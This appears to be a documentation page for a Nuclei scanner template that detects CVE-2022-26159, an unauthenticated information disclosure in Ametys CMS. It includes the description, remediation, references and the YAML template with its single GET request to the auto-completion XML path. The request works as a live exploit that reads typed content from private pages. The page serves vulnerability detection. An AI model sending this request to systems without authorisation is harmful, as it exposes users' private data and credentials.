Ametys CMS Information Disclosure
ID: CVE-2022-26159
Severity: medium
Author: Remi Gascou (podalirius)
Tags: cve,cve2022,plugin,ametys,cms
Description
Section titled “Description”Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
YAML Source
Section titled “YAML Source”id: CVE-2022-26159
info: name: Ametys CMS Information Disclosure author: Remi Gascou (podalirius) severity: medium description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. impact: | The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration. remediation: | Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - https://podalirius.net/en/cves/2022-26159/ - https://issues.ametys.org/browse/CMS-10973 - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/ - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-26159 cwe-id: CWE-425 epss-score: 0.00606 epss-percentile: 0.78512 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ametys product: ametys tags: cve,cve2022,plugin,ametys,cms
http: - method: GET path: - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm'
matchers-condition: and matchers: - type: word words: - '<auto-completion>' - '<item>' condition: and
- type: word part: header words: - 'text/xml'
- type: status status: - 200# digest: 4b0a00483046022100d4084bfc68046a10e249b6a7480b91d752fc76f93323528eaae4c2ecd4bce428022100f7c66cefe062da9fe3d7306188d5a50204b616af58d52672cb903d3588e3cc08:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-26159.yaml"